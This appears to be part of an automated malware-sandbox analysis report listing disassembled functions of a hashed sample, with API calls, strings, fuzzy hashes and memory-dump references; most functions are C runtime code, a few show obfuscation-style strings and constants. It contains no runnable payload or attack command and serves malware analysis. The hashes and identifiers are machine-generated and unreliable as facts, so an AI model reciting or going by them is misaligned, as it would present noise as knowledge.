                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: Write$AtomComm$BuildCallConfigConsoleCreateDriveFindFreeInitInputLoadLocalMountNamedNextPipePointPriorityPrivateProfileQueueResetResourceStructTableThreadTimeoutsTimerTypeVolumeWatch
                    • String ID: 28B$nuyimedanebilebecusimuyupito
                    • API String ID: 2355481934-1170745470
                    • Opcode ID: 2cdfcc1786475a73f255b311a6168b57c48b862163bce81c5d6203c832a99c53
                    • Instruction ID: 9847d1477f2c531b5a0ef8fc3cad807bc06f002c1b8e5782c770815a2f4e46ca
                    • Opcode Fuzzy Hash: 2cdfcc1786475a73f255b311a6168b57c48b862163bce81c5d6203c832a99c53
                    • Instruction Fuzzy Hash: 8021ED71648381AFE3909FA4EE49F597BB4BB48B02F004429F7C9E95F0D7B05584CB2A
                    Function 00420375 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 225COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
                    • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                    • API String ID: 2232461714-3257747220
                    • Opcode ID: 04149fff7d484b7af6d209735090a43ac1d06e728b7aa3b6354c695eac1493b8
                    • Instruction ID: 592a7666e3740430fc50358802b6dbe742c137b6e7fe3a8bd67328842e7a64ec
                    • Opcode Fuzzy Hash: 04149fff7d484b7af6d209735090a43ac1d06e728b7aa3b6354c695eac1493b8
                    • Instruction Fuzzy Hash: E8A16EB0E012288FDB64CF55DC89BEEB7B0AB48304F5481DAE41967292D7789E84CF59
                    Function 00421BF4 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 222COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                    • API String ID: 909868375-2264504294
                    • Opcode ID: de41c346285f0a6bf9e0e4d2b3c4c1de57edd21612992d7b4a37cc928930dc78
                    • Instruction ID: bc1861fbd97cbe70f312d9cd774f3e52bf1cfd6b4b3b1b84980de6bf0a26c3d9
                    • Opcode Fuzzy Hash: de41c346285f0a6bf9e0e4d2b3c4c1de57edd21612992d7b4a37cc928930dc78
                    • Instruction Fuzzy Hash: 6EA191B0E00228AFDB24DF55DD81BAEB7B4BF84304F54819AE50977281D7789E84CF59
                    Function 0040AEA7 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 252COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: _memset$CheckMemory__heap_alloc_base
                    • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Error: memory allocation: bad memory block type.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$6V
                    • API String ID: 4254127243-3384781889
                    • Opcode ID: acae6a7b75f8915044b7ed9d8f54120677f5ee87adbf4bca00faab028f28fb79
                    • Instruction ID: 26577865b8a4ed5ad95d448fc0768f1f999d7c74dc09bf0765f9f5fe3172ce00
                    • Opcode Fuzzy Hash: acae6a7b75f8915044b7ed9d8f54120677f5ee87adbf4bca00faab028f28fb79
                    • Instruction Fuzzy Hash: D4A17EB0A002099FDB14CF44D995BAE77B1FB48304F20826AE5256B3D2D779AD90CF9D
                    Function 0040CE97 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 81COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __errno$__invoke_watson_if_oneof__isctype_l_swprintf_s
                    • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                    • API String ID: 3084672839-3158630120
                    • Opcode ID: 0544f0f9012f5dbcc7c13027147053778e4aa1a0ffb4d087125b6885daedcc6b
                    • Instruction ID: 3d1f3340565646877e296cc5304f01a3b594d1790373dc8530087011bff9f84a
                    • Opcode Fuzzy Hash: 0544f0f9012f5dbcc7c13027147053778e4aa1a0ffb4d087125b6885daedcc6b
                    • Instruction Fuzzy Hash: 3631C470A04308DFDB04EFA1C991AADB772AF94304F20467AE4157F3C2D7789A41DB48
                    Function 02216437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                    • String ID:
                    • API String ID: 1442030790-0
                    • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                    • Instruction ID: 40a939369251f8571fc76bbb5309a3d1f826dba3c449a2dc4bb10d169986a07d
                    • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                    • Instruction Fuzzy Hash: 3E21C331124741BEEB317FE5DC02E2F7BDADF61760B508029E549550ACEB328960CFA0
                    Function 00410C40 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 326COMMON
                    Download Yara Rule
                    APIs
                    • GetStartupInfoA.KERNEL32(?), ref: 00410C80
                    • __nh_malloc_dbg.LIBCMTD ref: 00410CCB
                      • Part of subcall function 0040B2E0: __errno.LIBCMTD ref: 0040B31E
                      • Part of subcall function 0040B2E0: __errno.LIBCMTD ref: 0040B327
                    • __nh_malloc_dbg.LIBCMTD ref: 00410DF7
                    • GetFileType.KERNEL32(?), ref: 00410F07
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __errno__nh_malloc_dbg$FileInfoStartupType
                    • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
                    • API String ID: 1695019643-4097262939
                    • Opcode ID: 9c9382b40d71d085f37bbf860a500aa4b0be190d8aaa11099db570a95a66bec6
                    • Instruction ID: 99597a28eeaa74eb17766856bd833411f1f3c267cef97fcb0805177164219873
                    • Opcode Fuzzy Hash: 9c9382b40d71d085f37bbf860a500aa4b0be190d8aaa11099db570a95a66bec6
                    • Instruction Fuzzy Hash: A1E12874E04248CFDB24CFA8C895BADFBB1BB49314F24825ED4656B392C7759882CF49
                    Function 02213F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 02213F51
                      • Part of subcall function 02215BA8: __getptd_noexit.LIBCMT ref: 02215BA8
                    • __gmtime64_s.LIBCMT ref: 02213FEA
                    • __gmtime64_s.LIBCMT ref: 02214020
                    • __gmtime64_s.LIBCMT ref: 0221403D
                    • __allrem.LIBCMT ref: 02214093
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022140AF
                    • __allrem.LIBCMT ref: 022140C6
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022140E4
                    • __allrem.LIBCMT ref: 022140FB
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02214119
                    • __invoke_watson.LIBCMT ref: 0221418A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                    • Instruction ID: bd5a7ca22c9b48f5bc52c2861c330e46e2ddd90d4ac2ebc723a48bfbec0e1854
                    • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                    • Instruction Fuzzy Hash: 3C71DA71A20717ABD714EEB9CC40F5AB3FABF20324F144179E514E6698EB70DA44CB90
                    Function 0221650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                    • String ID:
                    • API String ID: 3432600739-0
                    • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                    • Instruction ID: 8d015adced3e6ce12c822386d3e57cf9ea1d2b7a6cbbfdbc32bf71c912aaafa3
                    • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                    • Instruction Fuzzy Hash: 91411532924305AFDB10AFE4DC80FAE3BEAEF64314F10842DE91856198DB7A9644DF51
                    Function 022184AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ExitProcess___crt
                    • String ID:
                    • API String ID: 1022109855-0
                    • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                    • Instruction ID: 513c1310c4764687c4bcf9e3c9b4428fc2eed2674a00bcffc9ee2b7904876e27
                    • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                    • Instruction Fuzzy Hash: 3131D431910351EBDB219F95FCC0C4D77E6FB34324315863AEA08572A8CBB459C8AF92
                    Function 00408E80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 117synchronizationpipetimeCOMMON
                    Download Yara Rule
                    APIs
                    • EnumResourceNamesW.KERNEL32(00000000,00000000,00000000,00000000,771A4FF0,771B1200,771ADFA0,771B1760), ref: 00408EC0
                    • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00408ECC
                    • LocalFileTimeToFileTime.KERNEL32(00000000,00000000,771A4FF0,771B1200,771ADFA0,771B1760), ref: 00408EF7
                    • GetNamedPipeHandleStateA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00408F1A
                    • FindNextVolumeW.KERNEL32(?,00000000,00000000,00000001,?,?,9E3779B9,00000020,?), ref: 00408F78
                    • SetLocaleInfoW.KERNEL32(00000000,00000000,Xanehe kajo big gizid xig), ref: 00408F87
                    • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 00408F93
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: EnumFileResourceTime$CreateFindHandleInfoLocalLocaleMutexNamedNamesNextPipeStateTypesVolume
                    • String ID: $Xanehe kajo big gizid xig
                    • API String ID: 1670703584-1716423450
                    • Opcode ID: 97eb1b1949e61062027f11c6d5b0ebedef0e29064a486188982007fd402617f3
                    • Instruction ID: dccf388cdf7c7b44ce4bb53d077e9029a9de98bc524f52b163cfbf02008a3ba2
                    • Opcode Fuzzy Hash: 97eb1b1949e61062027f11c6d5b0ebedef0e29064a486188982007fd402617f3
                    • Instruction Fuzzy Hash: CC4128716483419FD310CF54D945B5ABBF4FBC8705F04892EF694AB2E0D7B4A608CB9A
                    Function 0041C434 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 115COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __errno_memset$__invalid_parameter
                    • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$sizeInBytes > retsize
                    • API String ID: 2239222518-56445615
                    • Opcode ID: fb78b8f4ec6cdaa8e2a129d69dcf56810689399e22dae63eb6f9b54a3330a2aa
                    • Instruction ID: 5f56b3cc2b7edb9a44cb7224bbfaee9c103bd3d57a777715f577a98a246e501c
                    • Opcode Fuzzy Hash: fb78b8f4ec6cdaa8e2a129d69dcf56810689399e22dae63eb6f9b54a3330a2aa
                    • Instruction Fuzzy Hash: FA416D70944209EBCF24CF68CC857EE77B2FB44314F14866AE8256A3D0C778A991CF99
                    Function 0223FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    • std::exception::exception.LIBCMT ref: 0223FC1F
                      • Part of subcall function 0222169C: std::exception::_Copy_str.LIBCMT ref: 022216B5
                    • __CxxThrowException@8.LIBCMT ref: 0223FC34
                    • std::exception::exception.LIBCMT ref: 0223FC4D
                    • __CxxThrowException@8.LIBCMT ref: 0223FC62
                    • std::regex_error::regex_error.LIBCPMT ref: 0223FC74
                      • Part of subcall function 0223F914: std::exception::exception.LIBCMT ref: 0223F92E
                    • __CxxThrowException@8.LIBCMT ref: 0223FC82
                    • std::exception::exception.LIBCMT ref: 0223FC9B
                    • __CxxThrowException@8.LIBCMT ref: 0223FCB0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                    • String ID: leM
                    • API String ID: 3569886845-2926266777
                    • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                    • Instruction ID: 0494ad040d2f53832d0b17969d7f0c4ebf4afb0448503e07ce8bbec96e5a8ec0
                    • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                    • Instruction Fuzzy Hash: 2B111679C0030DBBCF04FFE5D895CEEBBBDAA04340B408566AD1897249EB74A3588F95
                    Function 021FF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free_malloc_wprintf$_sprintf
                    • String ID:
                    • API String ID: 3721157643-0
                    • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                    • Instruction ID: 38a835527170c3633cf632ad830142c06f4b06fa030c90ed6e84b42cf2f5b21d
                    • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                    • Instruction Fuzzy Hash: 0E1136B29507A47AC261A6F50C11FFF3BDD9F55302F0801A9FF9CD1180DB685A159BB1
                    Function 02201960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$_memset$_malloc_sprintf
                    • String ID:
                    • API String ID: 65388428-0
                    • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                    • Instruction ID: 39895354d8f4c20524974a2980afba0fa1b1ed7335c03bf1cc4eafe005559854
                    • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                    • Instruction Fuzzy Hash: 33516971D40219BBEB10DBE1DC86FEFBBB9FB04704F100025FA09B6180EB756A158BA5
                    Function 0040C2DE Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 179COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040C42E
                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040C390
                    • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 0040C541
                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 0040C4CC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: BytesCheck
                    • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                    • API String ID: 1653226792-1867057952
                    • Opcode ID: bbb9be6d14c27aea6400e1dc362bfbc4285a642c57f3d5f0d61c9e2c5ef1197d
                    • Instruction ID: 48dc3487a310bc243fef7da5bfde87d399783aca96b73289f484316436ef8384
                    • Opcode Fuzzy Hash: bbb9be6d14c27aea6400e1dc362bfbc4285a642c57f3d5f0d61c9e2c5ef1197d
                    • Instruction Fuzzy Hash: 8861EDB5E40105DBDB18CB85C8D5FBFB3B5AB48304F24825AE9157B3D1D278E882CB68
                    Function 0040EBD1 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 69fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F4), ref: 0040EC5E
                    • _strlen.LIBCMT ref: 0040EC84
                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040EC9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: FileHandleWrite_strlen
                    • String ID: jjj$t/j$4~$C~
                    • API String ID: 3444636687-2657085433
                    • Opcode ID: 93f2c7b6cce532e784fb1efdc0e471b34c6ce10c82e71568f369b35a3ab92e44
                    • Instruction ID: 6a661bee7ea537383e04ba63436059ba2f5f4f6a9aa5a028172c4ea51afbed02
                    • Opcode Fuzzy Hash: 93f2c7b6cce532e784fb1efdc0e471b34c6ce10c82e71568f369b35a3ab92e44
                    • Instruction Fuzzy Hash: 16212B70900108FBEB34CB4AD945BAD3374FB04308F14497AE406762E1E63A9E60DB8A
                    Function 021FF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
